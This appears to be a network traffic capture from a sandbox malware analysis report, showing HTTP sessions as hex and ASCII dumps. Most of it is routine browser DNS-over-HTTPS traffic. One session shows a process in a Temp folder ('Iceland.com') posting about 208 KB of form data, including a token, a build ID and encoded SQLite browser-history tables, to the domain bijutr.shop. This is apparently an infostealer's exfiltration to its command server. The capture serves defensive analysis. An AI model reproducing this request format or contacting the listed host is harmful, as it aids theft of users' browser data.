42 95 3d 1a be f9 ed d4 c0 dd Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}\|.nw'Gw=n'CSZB=
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%pA8C4qc(>@z1/V\|#Bo4v_mnniN ZKa./<_PBzi7~>v
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 Data Ascii: =K`!3\|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9\|c`rlqIm7n/n$i9xS=qwlVs^\|\|s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm\|n9*ENf+y1AQ-9w.Tvm'W:iw\|K.9-6l[/y[}5'y$+H%:Y1/F\
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i\|\|$yfxE?d;VR??p\<Wp;s.IN1 Q9
2024-12-27 06:10:41 UTC	1390	IN	Data Raw: 87 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 Data Ascii: QNtY\|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?\|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.5	49973	162.159.61.3	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:41 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-27 06:10:41 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:41 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 27 Dec 2024 06:10:41 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f872621b9384385-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:41 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 00 79 00 04 8e fa 40 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomy@c)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.5	49972	188.245.216.205	443	2800	C:\Users\user\AppData\Local\Temp\314782\Iceland.com

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:41 UTC	326	OUT	POST / HTTP/1.1 Content-Type: multipart/form-data; boundary=----F3E37GL6XLN7YU3OPP89 User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0 Host: bijutr.shop Content-Length: 207993 Connection: Keep-Alive Cache-Control: no-cache
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 35 34 30 64 65 61 35 35 61 37 38 34 31 62 37 62 32 61 63 64 62 66 38 65 61 66 31 38 31 39 62 37 0d 0a 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 62 38 38 36 33 65 66 63 35 39 38 38 30 61 36 33 37 32 66 39 37 36 35 62 36 37 62 65 61 64 63 33 0d 0a 2d 2d 2d 2d 2d 2d 46 33 45 33 37 47 4c 36 58 4c 4e 37 59 55 33 4f 50 50 38 39 0d 0a 43 6f 6e 74 Data Ascii: ------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="token"540dea55a7841b7b2acdbf8eaf1819b7------F3E37GL6XLN7YU3OPP89Content-Disposition: form-data; name="build_id"b8863efc59880a6372f9765b67beadc3------F3E37GL6XLN7YU3OPP89Cont
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 4d 54 43 6c 51 42 41 59 58 4b 79 73 42 57 58 52 68 59 6d 78 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 63 33 46 73 61 58 52 6c 58 33 4e 6c 63 58 56 6c 62 6d 4e 6c 42 55 4e 53 52 55 46 55 52 53 42 55 51 55 4a 4d 52 53 42 7a 63 57 78 70 64 47 56 66 63 32 56 78 64 57 56 75 59 32 55 6f 62 6d 46 74 5a 53 78 7a 5a 58 45 70 67 58 38 44 42 78 63 56 46 51 47 44 59 58 52 68 59 6d 78 6c 64 58 4a 73 63 33 56 79 62 48 4d 45 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 48 56 79 62 48 4d 6f 61 57 51 67 53 55 35 55 52 55 64 46 55 69 42 51 55 6b 6c 4e 51 56 4a 5a 49 45 74 46 57 53 42 42 56 56 52 50 53 55 35 44 55 6b 56 4e 52 55 35 55 4c 48 56 79 62 43 42 4d 54 30 35 48 56 6b 46 53 51 30 68 42 55 69 78 30 61 58 52 73 5a 53 42 4d 54 30 35 48 56 6b Data Ascii: MTClQBAYXKysBWXRhYmxlc3FsaXRlX3NlcXVlbmNlc3FsaXRlX3NlcXVlbmNlBUNSRUFURSBUQUJMRSBzcWxpdGVfc2VxdWVuY2UobmFtZSxzZXEpgX8DBxcVFQGDYXRhYmxldXJsc3VybHMEQ1JFQVRFIFRBQkxFIHVybHMoaWQgSU5URUdFUiBQUklNQVJZIEtFWSBBVVRPSU5DUkVNRU5ULHVybCBMT05HVkFSQ0hBUix0aXRsZSBMT05HVk
2024-12-27 06:10:41 UTC	16355	OUT	Data Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
2024-12-27 06:10:43 UTC	158	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 27 Dec 2024 06:10:43 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.5	49974	172.64.41.3	443	2180	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Timestamp	Bytes transferred	Direction	Data
2024-12-27 06:10:41 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-27 06:10:41 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-27 06:10:41 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Fri, 27 Dec 2024 06:10:41 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f87262358237277-EWR alt-svc: h3=":443"; ma=86400
2024-12-27 06:10:41 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 08 00 04 8e fa 51 e3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcomQ)

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
